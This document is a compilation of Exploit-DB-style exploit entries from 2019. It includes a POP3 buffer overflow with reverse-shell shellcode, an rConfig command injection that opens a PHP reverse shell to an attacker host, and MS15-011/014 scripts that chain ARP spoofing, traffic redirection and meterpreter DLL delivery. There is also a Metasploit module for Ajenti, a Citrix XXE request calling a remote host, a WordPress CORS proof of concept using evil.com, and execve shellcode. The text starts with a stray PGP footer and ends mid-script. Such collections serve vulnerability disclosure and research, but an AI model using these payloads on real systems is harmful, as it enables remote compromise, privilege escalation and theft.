-----END PGP SIGNATURE-----

# Exploit Title: Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow
# Date: 2019-10-01
# Author: Lance Biggerstaff
# Original Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Tested on: Windows 10
# Note: Every version of Windows 10 has a different offset ¯\_(ツ)_/¯

#!/usr/bin/python

import sys
import socket
import time

#msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISYTENING_PORT -b '\x00\xd9' -f python

buf =  ""
buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xe7\xb4\xfe\x5c\x83\xee\xfc\xe2\xf4\x1b\x5c"
buf += "\x7c\x5c\xe7\xb4\x9e\xd5\x02\x85\x3e\x38\x6c\xe4\xce"
buf += "\xd7\xb5\xb8\x75\x0e\xf3\x3f\x8c\x74\xe8\x03\xb4\x7a"
buf += "\xd6\x4b\x52\x60\x86\xc8\xfc\x70\xc7\x75\x31\x51\xe6"
buf += "\x73\x1c\xae\xb5\xe3\x75\x0e\xf7\x3f\xb4\x60\x6c\xf8"
buf += "\xef\x24\x04\xfc\xff\x8d\xb6\x3f\xa7\x7c\xe6\x67\x75"
buf += "\x15\xff\x57\xc4\x15\x6c\x80\x75\x5d\x31\x85\x01\xf0"
buf += "\x26\x7b\xf3\x5d\x20\x8c\x1e\x29\x11\xb7\x83\xa4\xdc"
buf += "\xc9\xda\x29\x03\xec\x75\x04\xc3\xb5\x2d\x3a\x6c\xb8"
buf += "\xb5\xd7\xbf\xa8\xff\x8f\x6c\xb0\x75\x5d\x37\x3d\xba"
buf += "\x78\xc3\xef\xa5\x3d\xbe\xee\xaf\xa3\x07\xeb\xa1\x06"
buf += "\x6c\xa6\x15\xd1\xba\xdc\xcd\x6e\xe7\xb4\x96\x2b\x94"
buf += "\x86\xa1\x08\x8f\xf8\x89\x7a\xe0\x3d\x16\xa3\x37\x0c"
buf += "\x6e\x5d\xe7\xb4\xd7\x98\xb3\xe4\x96\x75\x67\xdf\xfe"
buf += "\xa3\x32\xde\xf4\x34\x27\x1c\xec\x59\x8f\xb6\xfe\x5c"
buf += "\xf2\x3d\x18\x0c\xb7\xe4\xae\x1c\xb7\xf4\xae\x34\x0d"
buf += "\xbb\x21\xbc\x18\x61\x69\x36\xf7\xe2\xa9\x34\x7e\x11"
buf += "\x8a\x3d\x18\x61\x7b\x9c\x93\xbe\x01\x12\xef\xc1\x12"
buf += "\xb4\x80\xb4\xfe\x5c\x8d\xb4\x94\x58\xb1\xe3\x96\x5e"
buf += "\x3e\x7c\xa1\xa3\x32\x37\x06\x5c\x99\x82\x75\x6a\x8d"
buf += "\xf4\x96\x5c\xf7\xb4\xfe\x0a\x8d\xb4\x96\x04\x43\xe7"
buf += "\x1b\xa3\x32\x27\xad\x36\xe7\xe2\xad\x0b\x8f\xb6\x27"
buf += "\x94\xb8\x4b\x2b\xdf\x1f\xb4\x83\x74\xbf\xdc\xfe\x1c"
buf += "\xe7\xb4\x94\x5c\xb7\xdc\xf5\x73\xe8\x84\x01\x89\xb0"
buf += "\xdc\x8b\x32\xaa\xd5\x01\x89\xb9\xea\x01\x50\xc3\xbb"
buf += "\x7b\x2c\x18\x4b\x01\xb5\x7c\x4b\x01\xa3\xe6\x77\xd7"
buf += "\x9a\x92\x75\x3d\xe7\x17\x01\x5c\x0a\x8d\xb4\xad\xa3"
buf += "\x32\xb4\xfe\x5c"

jmpesp = '\x23\x49\xA1\x0F'

#buffer = '\x41' * 5093  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5093  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
buffer = '\x41' * 5095  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5097  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5099  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.121.87", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

# Exploit Title: rConfig 3.9.2 - Remote Code Execution
# Date: 2019-09-18
# Exploit Author: Askar
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22
# CVE : CVE-2019-16662

#!/usr/bin/python

import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 4:
    print "[+] Usage : ./exploit.py target ip port"
    exit()

target = sys.argv[1]

ip = sys.argv[2]

port = sys.argv[3]

payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))

install_path = target + "/install"

req = requests.get(install_path, verify=False)
if req.status_code == 404:
    print "[-] Installation directory not found!"
    print "[-] Exploitation failed !"
    exit()
elif req.status_code == 200:
    print "[+] Installation directory found!"
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload

print "[+] Triggering the payload"
print "[+] Check your listener !"

requests.get(url_to_send, verify=False)


rConfig-preauth.png

# Exploit Title: Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path
# Discovery Date: 2019-10-28
# Exploit Author: Alberto Vargas
# Vendor Homepage: https://www.issivs.com/product-detail/secure-os-enterprise/
# Software Link: https://www.issivs.com/schedule-a-free-demo/(trial version for unlicensed users)
# Version: 10.2 R1
# Tested on: Windows 10 Pro x64 Esp

# Version: 10.0.18362

# Schedule A Free Demo - ISS - Intelligent Security Systems<https://www.issivs.com/schedule-a-free-demo/>
# Schedule a Free Demo A leading developer of security surveillance and control systems for 
# networked digital video and audio recording, video image pattern processing and digital data transmission.
# www.issivs.com

# Summary: ISS’ global standard for video management, access control and video analytics, SecurOS™ Enterprise is perfectly suited for 
# managing large and demanding installations. The Enterprise framework can manage and monitor an unlimited number of cameras and devices, apply 
# intelligent video analytics, and act as an integration platform for a variety of 3rd party systems. Built to handle enterprise level deployments, 
# SecurOS Enterprise, comes with built-in Native Failure functionality, Microsoft Active Directory / LDAP integration, and has an extensive set 
# of Cybersecurity features making it one of the most reliable and secure video management platforms in the market today. SecurOS Enterprise 
# supports all the features of the other 3 editions.

# Description:    The application suffers from an unquoted search path issue impacting the service 'SecurosCtrlService'. This could potentially allow an 
# authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require 
# the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could 
# potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
# of the application.

# Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

SecurOS Control ServiceSecurosCtrlServiceC:\Program Files (x86)\ISS\SecurOS\securos_svc.exeAuto

# Service info:

C:\Users\user>sc qc SecurosCtrlService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SecurosCtrlService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : SecurOS Control Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, 
# Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7 , Windows Server 2012
# CVE : CVE-2015-0008
# Type: Remote
# Platform: Windows

# Description: While there exists multiple advisories for the vulnerability and video demos of 
# successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code 
# targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level 
# remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys).

#!/usr/bin/python3

import argparse
import os
import subprocess
import socket
import fcntl
import struct

# MS15-011 Exploit.
# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011
# Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
# Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.

def arpSpoof(interface, hostIP, targetIP):
    arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
    arpArgs = arpCmd.split()
    print("Arpspoofing: %s" % (arpArgs))
    p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)


def karmaSMB(hostIP):
    print("reverting GptTmpl.inf from bak")
    os.system("cp GptTmpl.inf.bak GptTmpl.inf")
    appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP)
    CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP)
    f = open("GptTmpl.inf","a", encoding='utf-16le')
    f.write(appInit)
    f.write(CURunKey)
    f.close()

    path = os.getcwd()

    fConfig = open("smb.conf","w")
    fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n")
    fConfig.close()

    karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ "
    os.system(karmaCmd)


def iptables_config(targetIP, hostIP):
    print('[+] Running command: echo "1"> /proc/sys/net/ipv4/ip_forward')
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
    print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE')
    os.system('echo "1"> /proc/sys/net/ipv4/ip_forward')
    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
    os.system('iptables -t nat -A POSTROUTING -j MASQUERADE')


def get_interface_address(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])

def generatePayload(lhost, lport):
    print("generating payload(s) and metasploit resource file")
    msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport)
    os.system(msfDll)
    msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport)
    print("metasploit resource script: %s" % msfResource)
    print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically")

    file = open("meta_resource.rc", "w+")
    file.write(msfResource)
    file.close()



if __name__ == '__main__':

    parser = argparse.ArgumentParser()

    # Add arguments
    parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True)
    parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
    parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
    parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False)
    parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False)

    args = parser.parse_args()

    # Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files.
    print ("checking for missing file(s)")
    if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"):
        print("Requirements missing. Downloading required files from github")
        os.system("git clone https://github.com/Freakazoidile/MS15-011-Files")
        os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/")

    # Get the provided interfaces IP address
    ipAddr = get_interface_address(args.interface)

    if args.lhost is not None:
        lhost = args.lhost
    else:
        lhost = ipAddr

    if args.lport is not None:
        lport = args.lport
    else:
        lport = '4444'


    dcSpoof = ""
    dcCommaList = ""
    count = 0

    # loop over the domain controllers, poison each and target the host IP
    # create a comma separated list of DC's
    # create a "-t" separate list of DC's for use with arpspoof
    for dc in args.domain_controller:
        dcSpoof += "-t %s " % (dc)
        if count > 0: 
            dcCommaList += ",%s" % (dc)
        else:
            dcCommaList += "%s" % (dc)

        arpSpoof(args.interface, dc, "-t %s" % (args.target_ip))
        count += 1

    # arpspoof the target and all of the DC's
    arpSpoof(args.interface, args.target_ip, dcSpoof)

    # generate payloads
    generatePayload(lhost, lport)

    # Setup iptables forwarding rules
    iptables_config(args.target_ip, ipAddr)

    #run Karmba SMB Server
    karmaSMB(ipAddr)


    print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, args.domain_controllers))
    print("If you interupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!")

# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, 
# Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7 , Windows Server 2012
# CVE : CVE-2015-0009
# Type: Remote
# Platform: Windows

# Description: This exploit code targets vulnerable systems in order to corrupt GPO updates which causes 
# the target system to revert various security settings to their default settings. This includes SMB server 
# and network client settings, which by default do not require SMB signing except for domain controllers. 
# Successful exploitation against a system with a hardened configuration that requires SMB Signing by the 
# network client will make the target system vulnerable to MS15-011, which can lead to remote code execution.

#!/usr/bin/python3

import argparse
import fcntl
import os
import socket
import struct
import subprocess
from subprocess import PIPE
import re

# MS15-014 Exploit.
# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-014
# Example usage: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
# Example usage with multiple DC's: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.

def arpSpoof(interface, hostIP, targetIP):
    arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
    arpArgs = arpCmd.split()
    print("Arpspoofing: %s" % (arpArgs))
    p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)


def corrupt_packet():
    global count

    # NetSed listen port 446 (iptables redirected), modify traffic, then forward to destination 445.
    netsedCmd = "netsed tcp 446 0 445 s/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00%00" #>/dev/null 2>&1 &
    netsedArgs = netsedCmd.split()
    print("Starting NetSed!")
    print("NetSed: %s" % (netsedArgs))
    netsedP = subprocess.Popen(netsedArgs, stdout=PIPE, stderr=subprocess.STDOUT)


    while True:
        o = (netsedP.stdout.readline()).decode('utf-8')

        if o != '':
            if args['verbose']:
                print("NetSed output: %s" % o)

            if re.search('Applying rule', o) is not None:
                count += 1
                print('packet corrupted: % s' % count)
                # During testing, after 4 attempts to retrieve GptTmpl.inf the exploit was successful. Sometimes the machine requested the file 7 times, but exploitation was always successful after 4 attempts.
                # The script waits for up to 7 for reliability. Tested on Windows 7 SP1 and Server 2012 R2
                if count == 4:
                    print("Exploit has likely completed!! waiting for up to 7 corrupted packets for reliability. \nIf no more packets are corrupted in the next couple of minutes kill this script. The target should be reverted to default settings with SMB signing not required on the client. \nTarget can now be exploited with MS15-011 exploit.")

        #During testing, after 7 attempts to retrieve GptTmpl.inf the GPO update stopped and exploitation was successful.
        if count == 7:
            break


def get_interface_address(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])

def iptables_config(targetIP, hostIP):
    #allow forwarding, redirect arpspoofed traffic from dport 445 to 446 for NetSed.
    print('[+] Running command: echo "1"> /proc/sys/net/ipv4/ip_forward')
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446')
    print('[+] Make sure to cleanup iptables after exploit completes')
    os.system('echo "1"> /proc/sys/net/ipv4/ip_forward')
    os.system('iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446')

if __name__ == '__main__':

    parser = argparse.ArgumentParser(description='Find the SecEdit\GptTmpl.inf UUID to exploit MS15-014')
    parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-014", required=True)
    parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
    parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
    parser.add_argument("-v", "--verbose", help="Toggle verbose mode. displays all output of NetSed, very busy terminal if enabled.", action='store_true')

    args = vars(parser.parse_args())

    target_ip = args['target_ip']

    count = 0

    # Get the provided interfaces IP address
    ipAddr = get_interface_address(args['interface'])

    dcSpoof = ""
    dcCommaList = ""
    dcCount = 0

    # loop over the domain controllers, poison each and target the host IP
    # create a comma separated list of DC's
    # create a "-t" separate list of DC's for use with arpspoof
    for dc in args['domain_controller']:
        dcSpoof += "-t %s " % (dc)
        if dcCount > 0: 
            dcCommaList += ",%s" % (dc)
        else:
            dcCommaList += "%s" % (dc)

        arpSpoof(args['interface'], dc, "-t %s" % (target_ip))
        dcCount += 1

    # arpspoof the target and all of the DC's
    arpSpoof(args['interface'], target_ip, dcSpoof)

    # Setup iptables forwarding rules
    iptables_config(target_ip, ipAddr)

    #identify requests for GptTmpl.inf and modify the packet to corrupt it using NetSed.
    corrupt_packet()

# Exploit Title: Wordpress 5.2.4 - Cross-Origin Resource Sharing
# Date: 2019-10-28
# Exploit Author: Milad Khoshdel
# Software Link: https://wordpress.org/download/
# Version: Wordpress 5.2.4
# Tested on: Linux Apache/2 PHP/7.2

# Vulnerable Page:
https://[Your-Domain]/wp-json

# POC:
# The web application fails to properly validate the Origin header (check Details section for more information) 
# and returns the header Access-Control-Allow-Credentials: true. In this configuration any website can issue 
# requests made with user credentials and read the responses to these requests. Trusting arbitrary 
# origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. 

# REGUEST -->

GET /wp-json/ HTTP/1.1
Origin: https://www.evil.com
Accept: */*
Accept-Encoding: gzip,deflate
Host: [Your-Domain]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Connection: Keep-alive

# RESPONSE -->

HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 07:34:39 GMT
Server: NopeJS
X-Robots-Tag: noindex
Link: <https://[Your-Domain].com/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization, Content-Type
Allow: GET
Access-Control-Allow-Origin: https://www.evil.com
Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
Vary: Origin,Accept-Encoding,User-Agent
Keep-Alive: timeout=2, max=73
Connection: Keep-Alive
Content-Type: application/json; charset=UTF-8
Original-Content-Encoding: gzip
Content-Length: 158412

# Exploit Title : Craft CMS up to 3.1.7 Password Prompt Form Lockout weak authentication
# Author [Discovered By] : Mohammed Abdul Raheem
# Author's [Company Name] : TrekShield IT Solution Private Limited
# Author [Exploit-db] : https://www.exploit-db.com/?author=9783
# Found Vulnerability On : 16-01-2019
# Vendor Homepage:https://craftcms.com/
# Software Information Link: https://github.com/craftcms/demo
# Software Affected Versions : CraftCms upto v3.1.7
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : No Rate Limit implemented on Sensitive Actions
# CVE : CVE-2019-15929
####################################################################

# Description about Software :
***************************
Craft is a flexible, user-friendly CMS for creating custom digital
experiences on the web and beyond.

####################################################################

# Vulnerability Description :
*****************************

In CraftCMS upto v3.1.7 the elevated session password prompt was not
being rate limited like normal login forms, all the sensitive actions
were Rate Limited but forgot to implement Rate Limit Protection on
Form Change Password leading to the possibility of a brute force
attempt on them to guess password.


# Impact :
***********
This is going to have an impact on confidentiality. An attacker have
the possibilities to change accounts password with Brute Force Attack.

# Steps To Validate :
*********************

1. Login to CraftCMS account.
2. Go to* https://demo.craftcms.com/
<https://demo.craftcms.com/>*<Token-Here>/s/admin/myacco
unt/
3. Enter New Password and click save
4. Application will ask to enter Current Password.
5. Enter random Password and capture the request with Burp > send to
intruder > start attack with payloads you want.

# ATTACHED POC :
****************

[image: image.png]

# More Information Can be find here :
*************************************
https://github.com/craftcms/cms/blob/develop/CHANGELOG-v3.md#security-5

###################################################################

# Discovered By Mohammed Abdul Raheem from TrekShield.com

# Exploit Title: Ajenti 2.1.31 - Remote Code Exection (Metasploit)
# Date: 2019-10-29
# Exploit Author: Onur ER
# Vendor Homepage: http://ajenti.org/
# Software Link: https://github.com/ajenti/ajenti
# Version: 2.1.31
# Tested on: Ubuntu 19.10

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
'Name'            => "Ajenti 2.1.31 Remote Code Execution",
'Description'     => %q{
                        This module exploits a command injection in Ajenti <= 2.1.31.
                        By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
                      },
'Author'          => [
'Jeremy Brown', # Vulnerability discovery
'Onur ER <onur@onurer.net>' # Metasploit module
                      ],
'References'      => [
                          ['EDB', '47497']
                      ],
'DisclosureDate'  => '2019-10-14',
'License'         => MSF_LICENSE,
'Platform'        => 'python',
'Arch'            => ARCH_PYTHON,
'Privileged'      => false,
'Targets'         => [
                          [ 'Ajenti <= 2.1.31', {} ]
                      ],
'DefaultOptions'  =>
                          {
'RPORT'   => 8000,
'SSL'     => 'True',
'payload' => 'python/meterpreter/reverse_tcp'
                          },
'DefaultTarget'   => 0
          ))
    register_options([
                         OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = send_request_cgi({
'method' => 'GET',
'uri'    => "/view/login/normal"
                           })
    if res and res.code == 200
      if res.body =~ /'ajentiVersion', '2.1.31'/
        return Exploit::CheckCode::Vulnerable
      elsif res.body =~ /Ajenti/
        return Exploit::CheckCode::Detected
      end
    end
    vprint_error("Unable to determine due to a HTTP connection timeout")
    return Exploit::CheckCode::Unknown
  end


  def exploit
    print_status("Exploiting...")
    random_password = rand_text_alpha_lower(7)
    json_body = { 'username' => "`python -c \"#{payload.encoded}\"`",
'password' => random_password,
'mode' => 'normal'
    }
    res = send_request_cgi({
'method' => 'POST',
'uri'    => normalize_uri(target_uri, 'api', 'core', 'auth'),
'ctype'  => 'application/json',
'data'   => JSON.generate(json_body)
     })
  end
end

# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service
# Date: 2019-10-30
# Vendor Homepage:https://www.alloksoft.com/
# Software Link:  https://www.alloksoft.com/wmv.htm
# Exploit Author: Nithoshitha S
# Tested Version: v4.6.1217
# Tested on: Windows 7 x64
#            Windows XP SP3

# 1.- Run python code :poc.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open  WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
# 5.- Click 'OK' and you will see a crash.

# poc.py

#!/usr/bin/env python
buffer = "\x41" * 6000

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

# Exploit Title: Citrix StoreFront Server 7.15 - XML External Entity Injection
# Date: 2019-08-28
# Exploit Author: Vahagn Vardanya
# Vendor Homepage:https://www.citrix.com/downloads/storefront/
# Software Link: https://support.citrix.com/article/CTX251988
# Version:
# Citrix StoreFront Server  earlier than 1903
# Citrix StoreFront Server 7.15 LTSR earlier than CU4 (3.12.4000)
# Citrix StoreFront Server 7.6 LTSR earlier than CU8 (3.0.8000)#
# Tested on: Windows
# Shodan query https://www.shodan.io/search?query=%2FCitrix%2FStoreWeb

# PoC

POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1
Content-Type: application/vnd.citrix.requesttoken+xml
Accept: application/vnd.citrix.requesttokenresponse+xml, application/vnd.
citrix.authenticateresponse-1+xml
Accept-Language:ru,en-US;q=0.9,en;q=0.8,fr;q=0.7,hy;q=0.6,de;q=0.5,es;q=0.4,nb;q=0.3,nl;q=0.2,fi;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
X-Forwarded-For: 192.168.204.1
X-Citrix-Agent: crm.
X-Citrix-AM-CredentialTypes: none, username, domain, password, newpassword,passcode, savecredentials, textcredential, webview, webview
X-Citrix-AM-LabelTypes: none, plain, heading, information, warning, error,confirmation, image
X-Citrix-IsUsingHTTPS: No
Host: 192.168.204.131
Content-Length: 331
Expect: 100-continue

<?xml version="1.0" encoding="utf-8" standalone='no'?><!DOCTYPE
requesttoken [<!ENTITY % xxe SYSTEM "http://REMOTE">%xxe; ]><requesttoken
xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken
"><for-service>a</for-service><for-service-url>http://secure-web.cisco.com/
<http://secure-web.cisco.com/1ijL9Cycthe9FsmytQkHCl1Xg9pMufEcuz0PmzFHVwkbFjSep42bW3GRBkLUxePJTdOcYeHl5hlVi95aQc-F0KUuqpBKFdx4EXJ_ppx3MY000cALA2hGugGjMX3hbmvhtPOTba7B4LnAcpuyFDLHiSlv8xyu_CzN0mhekRY51L34p4Wy9oMguR9Bj8YWAm6KxixMl1DiaZ88h4FVR0vKzHdtedNF63xO329dQAtQuVWiipK_rt4rnVWKmorTTrbp-bsdV7zUBsqjON-MZYpzagQ/http%3A%2F%2F192.168.204.146%2FCitrix%2Fstore_nameAuth%2Fauth%2Fv1%2Ftoken></for-service-url><reqtokentemplate
/><requested-lifetime>0.08:00:00</requested-lifetime></requesttoken>

# Title: Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
# Author: Daniel Ortiz
# Date: 2019-10-30
# Tested on: Linux 4.18.0-25-generic #26 Ubuntu
# Size: 47 bytes
# SLAE ID: PA-9844

#----------------------- execve ------------------------------------------------#

global _start

section .text

_start:

        xor eax, eax
        push eax

        ; PUSH //bin/sh (8 bytes) 

        push 0x68732f2f
        push 0x6e69622f
        mov ebx, esp

        push eax
        mov edx, esp

        push ebx
        mov ecx, esp

        mov al, 11
        int 0x80

#------------------------ execve shellcode -------------------------------------#

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

#----------------------- Python Encoder ----------------------------------------#

#!/usr/bin/python

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

encoded = ""
encoded2 = ""

rot = 8

print 'Encoded shellcode ...'

